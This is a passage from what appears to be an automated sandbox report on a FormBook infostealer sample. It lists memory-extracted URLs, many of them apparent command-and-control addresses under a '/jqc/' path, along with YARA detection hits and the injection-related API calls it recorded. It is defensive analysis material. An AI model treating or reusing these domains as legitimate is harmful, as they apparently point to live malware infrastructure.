          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.11sxsx.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.11sxsx.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.11sxsx.com/jqc/www.lhc965.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.11sxsx.comReferer:
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.bebywye.site
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.bebywye.site/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.bebywye.site/jqc/www.ip-freight.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.bebywye.siteReferer:
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.eaglesnestpropheticministry.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.eaglesnestpropheticministry.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.eaglesnestpropheticministry.com/jqc/www.internetmarkaching.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.eaglesnestpropheticministry.comReferer:
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.internetmarkaching.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.internetmarkaching.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.internetmarkaching.com/jqc/www.weddingmustgoon.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.internetmarkaching.comReferer:
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.ip-freight.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.ip-freight.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.ip-freight.com/jqc/www.toweroflifeinc.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.ip-freight.comReferer:
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.kenniscourtureconsignments.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.kenniscourtureconsignments.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.kenniscourtureconsignments.com/jqc/www.novergi.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.kenniscourtureconsignments.comReferer:
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.lhc965.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.lhc965.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.lhc965.com/jqc/www.topheadlinetowitness-today.info
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.lhc965.comReferer:
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.novergi.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.novergi.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.novergi.com/jqc/M
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.novergi.comReferer:
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.com/jqc/www.tiendazoom.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.comReferer:
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.strahlenschutz.digital
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.strahlenschutz.digital/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.strahlenschutz.digital/jqc/www.theorangepearl.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.strahlenschutz.digitalReferer:
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.com/jqc/www.registeredagentfirm.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.comReferer:
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.theorangepearl.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.theorangepearl.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.theorangepearl.com/jqc/www.11sxsx.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.theorangepearl.comReferer:
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.tiendazoom.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.tiendazoom.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.tiendazoom.com/jqc/www.eaglesnestpropheticministry.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.tiendazoom.comReferer:
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.topheadlinetowitness-today.info
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.topheadlinetowitness-today.info/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.topheadlinetowitness-today.info/jqc/www.kenniscourtureconsignments.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.topheadlinetowitness-today.infoReferer:
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.com/jqc/www.strahlenschutz.digital
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.comReferer:
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.weddingmustgoon.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.weddingmustgoon.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.weddingmustgoon.com/jqc/www.bebywye.site
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.weddingmustgoon.comReferer:
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00419D60 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00419E10 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00419E90 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00419D5D NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00419E0B NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00419E8A NtClose,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00419F3A NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018595D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018598F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018597A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018599D0 NtCreateProcessEx,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018595F0 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859520 NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0185AD30 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859950 NtQueueApcThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859560 NtWriteFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018598A0 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859820 NtEnumerateKey,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0185B040 NtSuspendThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0185A3B0 NtGetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859FE0 NtCreateMutant,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859B00 NtSetValueKey,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0185A710 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859730 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859760 NtOpenProcess,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859770 NtSetInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0185A770 NtOpenThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859A80 NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018596D0 NtCreateKey,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859610 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859A10 NtQuerySection,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859650 NtQueryValueKey,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E295D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E299A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E296E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E296D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E298F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E298A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E2B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E295F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E299D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E2AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E297A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E2A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E2A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E2A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00ED9D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00ED9E90 NtClose,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00ED9E10 NtReadFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00ED9F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00ED9D5D NtCreateFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00ED9E8A NtClose,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00ED9E0B NtReadFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00ED9F3A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_02F1359C CreateProcessAsUserW,
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_02F11898
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_02F11168
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_02F048A2
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_02F063AB
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_02F12E78
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_02F12A00
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_016499C1
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_0164BBE8
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_0164A4B9
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_01643F90
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_0164F618
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_0164EE1A
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_0164D6AA
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_016476B0
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_0164F608
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0041D8D2
